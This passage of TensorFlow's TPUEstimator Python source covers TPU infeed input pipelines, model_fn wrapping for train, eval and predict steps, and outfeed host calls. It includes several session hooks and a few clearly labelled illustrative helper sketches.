shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset
def generate_per_host_v2_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
del host_id # unused
captured_infeed_queue = _CapturedObject()
hooks = []
with ops.device(device):
inputs = _Inputs.from_input_fn(input_fn())
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
# TODO(b/XXX): Add predict support for PER_HOST_V2
raise TypeError('Mode PREDICT is not yet supported in PER_HOST_V2 mode.')
hooks.append(inputs.dataset_initializer_hook())
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
num_replicas_per_host = ctx.num_of_replicas_per_host
with ops.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for _ in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
with ops.control_dependencies(control_deps):
features, labels = inputs.features_and_labels() # Calls get_next()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_configuration_from_sharded_input_tensors(
per_host_sharded_inputs)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=ctx.tpu_ordinal_function)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in `_TPUContext`, it
invokes `input_fn` for all cores (usually multi-host TPU training) or for one
host (usually for single-host TPU evaluation), and sends all `features` and
`labels` returned by `input_fn` to TPU infeed. For per-core invocation,
`features` and `labels` are piped to infeed directly, one tuple for each
core. For per-host invocation, `features` and `labels` are split at host
(with respect to `batch_axis`) and piped to all cores accordingly.
In addition, flattening/unflattening is handled by `_InputPipeline`. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). `features` can be `Tensor` or dict of string name to `Tensor`,
and `labels` could be `None`, `Tensor`, or dict of string name to `Tensor`.
The TPU infeed/outfeed library expects a flattened tensor list. So, `features`
and `labels` need to be flattened before infeed enqueue, and their structure
needs to be recorded in order to restore them after infeed dequeue.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self):
# Holds the structure of inputs
self._feature_names = []
self._label_names = []
self._has_labels = False
self._signals_helper = None
# Internal state.
self._initialized = False
def has_labels(self):
return self._has_labels
def validate_and_record_structure(self, features, labels, signals=None):
"""Validates and records the structure of features` and `labels`."""
def _extract_key_names(tensor_or_dict):
if tensor_or_dict is None:
return []
return sorted(tensor_or_dict.keys()) if isinstance(
tensor_or_dict, dict) else []
# Extract structure.
has_labels = labels is not None
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if signals is not None and self._signals_helper is None:
# Record signals helper.
self._signals_helper = _SignalsHelper(signals)
if self._initialized:
# Verify the structure is the same. The following should never happen.
assert feature_names == self._feature_names, 'feature keys mismatched'
assert label_names == self._label_names, 'label keys mismatched'
assert has_labels == self._has_labels, 'label presence mismatched'
else:
# Record structure.
self._initialized = True
self._feature_names = feature_names
self._label_names = label_names
self._has_labels = has_labels
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
flattened_inputs = []
if self._feature_names:
# We need a fixed ordering for enqueueing and dequeueing.
flattened_inputs.extend(
[features[name] for name in self._feature_names])
else:
flattened_inputs.append(features)
if labels is not None:
if self._label_names:
# We need a fixed ordering for enqueueing and dequeueing.
flattened_inputs.extend([labels[name] for name in self._label_names])
else:
flattened_inputs.append(labels)
if signals is not None:
flattened_inputs.extend(_SignalsHelper.as_tensor_list(signals))
return flattened_inputs
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
An `_Inputs` instance holding the restored `features` and `labels`, where
`labels` could be None. Each one, if present, has the same structure
(single tensor vs dict) as the one returned by `input_fn`.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
expected_num_features = (
len(self._feature_names) if self._feature_names else 1)
if self._has_labels:
expected_num_labels = (
len(self._label_names) if self._label_names else 1)
else:
expected_num_labels = 0
expected_num_signals = (
self._signals_helper.num_signals if self._signals_helper else 0)
expected_num_tensors = (
expected_num_features + expected_num_labels + expected_num_signals)
if expected_num_tensors != len(flattened_inputs):
raise ValueError(
'The number of flattened tensors does not match the expected number. '
'Expected {}, got {}'.format(expected_num_tensors,
len(flattened_inputs)))
if self._feature_names:
unflattened_features = dict(
zip(self._feature_names, flattened_inputs[:expected_num_features]))
else:
# Single tensor case
unflattened_features = flattened_inputs[0]
if expected_num_labels == 0:
unflattened_label = None
elif self._label_names:
label_list = flattened_inputs[
expected_num_features:expected_num_features + expected_num_labels]
unflattened_label = dict(zip(self._label_names, label_list))
else:
# Single tensor case.
unflattened_label = flattened_inputs[expected_num_features]
signals = None
if expected_num_signals != 0:
tensor_list_for_signals = flattened_inputs[
expected_num_features + expected_num_labels:]
signals = self._signals_helper.unflatten(tensor_list_for_signals)
return _Inputs(unflattened_features, unflattened_label, signals=signals)
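# Worked example (an assumption): with features == {'x': fx, 'y': fy},
# labels == lt and no signals, flatten_features_and_labels returns
# [fx, fy, lt] (feature keys in sorted order first, then labels), and
# unflatten_features_and_labels on that list returns an _Inputs wrapping
# ({'x': fx, 'y': fy}, lt).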
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_TPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder()
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# While tf.while_loop is called, the body function, which invokes
# `enqueue_fn` passed in, is called to construct the graph. So, input_fn
# structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_hooks = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
# Invoke input pipeline for each core and placed on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
else:
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id))
else:
enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
all_hooks.extend(hooks)
# NOTE(xiejw): We dispatch here based on the return type of the
# users `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should be always safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if is_dataset:
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
# infeed_queue is used to generate dequeue ops. The only thing it needs for
# dequeue is the dtypes and shapes, so any one of them can be used. Here, grab
# the first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, all_hooks, run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
    # Perform some sanity checks to log user-friendly information. We should
    # error out to give users a better error message. But, if
    # _WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
    # user code, so we only log a warning.
if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/programmers_guide/datasets for '
                 'instructions).')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
This makes calling model_fn on CPU and TPU easier and more consistent and
performs necessary check and mutation required by TPU training and evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
    For TPU training, a train (computation) step is first wrapped in a
    tf.while_loop control flow to repeat it many times and is then replicated
    to all TPU shards. Besides, the input should be taken from the TPU infeed
    rather than from the input pipeline (input_fn) directly. To fit the TPU
    loop-and-replicate pattern, the original train computation is reshaped
    into the returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of train_fn, host_calls, and captured scaffold_fn. The train_fn
representing the train step for TPU.
"""
host_call = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
def train_step(loss):
"""Training step function for use inside a while loop."""
del loss # unused; required in function signature.
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if isinstance(estimator_spec, TPUEstimatorSpec):
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
# We must run train_op to update the variables prior to running the
# outfeed.
with ops.control_dependencies([train_op]):
host_call_outfeed_ops = []
if (isinstance(estimator_spec, TPUEstimatorSpec) and
estimator_spec.host_call is not None):
host_call.record({'host_call': estimator_spec.host_call})
host_call_outfeed_ops = host_call.create_enqueue_op()
with ops.control_dependencies(host_call_outfeed_ops):
return array_ops.identity(loss)
return train_step, host_call, captured_scaffold_fn
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
    For TPU evaluation, an eval (computation) step is first wrapped in a
    tf.while_loop control flow to repeat it many times and is then replicated
    to all TPU shards. Besides, the input and output are slightly different.
    The input, features and labels, should be taken from the TPU infeed rather
    than from the input pipeline (input_fn) directly. Output is managed in two
    stages. First, the model outputs, as the result of the evaluation
    computation (usually model logits), are transferred from the TPU system to
    the CPU. Then, all model outputs are concatenated on the CPU and sent to
    the metric_fn for metrics computation. To fit the TPU evaluation pattern,
    the original eval computation is reshaped into the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of eval_fn, host_calls, and captured scaffold_fn. The eval_fn
representing the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, TPUEstimatorSpec):
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
to_record = {}
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return math_ops.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of predict_fn, host_calls, and captured scaffold_fn. The
predict_fn representing the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, TPUEstimatorSpec):
raise RuntimeError(
'estimator_spec used by TPU prediction must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
to_record = {}
identity_fn = lambda **kwargs: kwargs
      # TODO(xiejw): Add validation for the prediction dictionary.
      # TODO(xiejw): Add support for a single tensor as predictions.
if not isinstance(tpu_estimator_spec.predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return predict_step, host_calls, captured_scaffold_fn
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
model_fn_args = util.fn_args(self._model_fn)
kwargs = {}
    # Make deep copies of `config` and `params` in case the user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
if isinstance(params, hparam.HParams):
params.add_hparam(_BATCH_SIZE_KEY, batch_size_for_model_fn)
else:
params[_BATCH_SIZE_KEY] = batch_size_for_model_fn
estimator_spec = self._model_fn(features=features, **kwargs)
if (self._ctx.is_running_on_cpu(is_export_mode) and
isinstance(estimator_spec, TPUEstimatorSpec)):
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`.
return estimator_spec.as_estimator_spec()
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, TPUEstimatorSpec):
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(err_msg.format('training_chief_hooks'))
if estimator_spec.training_hooks:
raise ValueError(err_msg.format('training_hooks'))
if estimator_spec.evaluation_hooks:
raise ValueError(err_msg.format('evaluation_hooks'))
if estimator_spec.scaffold:
logging.warning('EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
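# --- Illustrative sketch (editor's addition, not part of the original module).
# `_ModelFnWrapper._call_model_fn` above inspects the user's model_fn signature
# and only passes `labels`, `mode`, `config`, and `params` when the function
# actually declares them. The standalone helper below mimics that dispatch with
# the stdlib `inspect` module (the real code uses `util.fn_args`); it assumes
# Python 3 and is meant purely to clarify the idea, not to be used by the
# estimator itself.
def _example_build_model_fn_kwargs(model_fn, labels, mode, config, params):
  """Builds a kwargs dict for `model_fn` based on its signature (sketch)."""
  import inspect
  arg_names = set(inspect.signature(model_fn).parameters)
  kwargs = {}
  if 'labels' in arg_names:
    kwargs['labels'] = labels
  elif labels is not None:
    raise ValueError(
        'model_fn does not take labels, but input_fn returns labels.')
  if 'mode' in arg_names:
    kwargs['mode'] = mode
  if 'config' in arg_names:
    kwargs['config'] = config
  if 'params' in arg_names:
    kwargs['params'] = params
  return kwargs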
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = util.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise e
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
with ops.device(tpu.core(0)):
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
    across all shards. The concatenated tensors are passed to the host_fn,
    which is executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return []
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
    # constrain it such that we have at most one outfeed dequeue and enqueue
# per replica.
tpu_device_placement_fn = self._ctx.tpu_device_placement_function
for i in xrange(self._ctx.num_replicas):
with ops.device(tpu_device_placement_fn(i)):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes, shapes=tensor_shapes)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos+len(self._tensors[name])]
pos += len(self._tensors[name])
    # It is assumed that evaluation always happens on a single-host TPU system.
    # So, place all ops on the TPU host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with ops.device(self._ctx.tpu_host_placement_function(core_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
# TODO(xiejw): Allow users to specify the axis for batch size
# dimension.
dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = self._host_fns[name](**dequeue_ops)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise e
else:
ret[name] = self._host_fns[name](*dequeue_ops)
return ret
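# --- Illustrative sketch (editor's addition, not part of the original module).
# `_OutfeedHostCall.create_cpu_hostcall` above calls each `(host_fn, tensors)`
# pair as `host_fn(*tensors)` or `host_fn(**tensors)`, depending on whether
# `tensors` is a list/tuple or a dict. The self-contained example below mirrors
# that contract with plain Python values standing in for Tensors.
def _example_cpu_hostcall_contract():
  """Shows the (host_fn, tensors) structure expected by _OutfeedHostCall."""
  host_calls = {
      'host_call': (lambda step, loss: {'step': step, 'loss': loss},
                    {'step': 100, 'loss': 0.25}),
      'eval_metrics': (lambda *args: list(args), [1, 2, 3]),
  }
  ret = {}
  for name, (host_fn, tensors) in host_calls.items():
    if isinstance(tensors, (tuple, list)):
      ret[name] = host_fn(*tensors)
    else:
      ret[name] = host_fn(**tensors)
  # ret == {'host_call': {'step': 100, 'loss': 0.25}, 'eval_metrics': [1, 2, 3]}
  return ret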
class _OutfeedHostCallHook(session_run_hook.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return basic_session_run_hooks.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook):
"""Count examples during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
examples_per_sec = self._batch_size * elapsed_steps / elapsed_time
if self._summary_writer is not None:
example_summary = Summary(value=[
Summary.Value(tag='examples_sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(example_summary, global_step)
logging.info('examples/sec: %g', examples_per_sec)
class InstallSignalHandlerHook(session_run_hook.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
  size when calling the `input_fn` and `model_fn`. Users should specify the
  global batch size in the constructor, and then get the batch size for each
  shard in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
    `input_fn` gets per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
predict will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker).
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
      'accuracy': tf.metrics.accuracy(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
    if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
    if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
  It is not designed for latency-critical systems. In addition, due to some
  usability issues, for prediction with a small dataset, CPU `.predict`, i.e.,
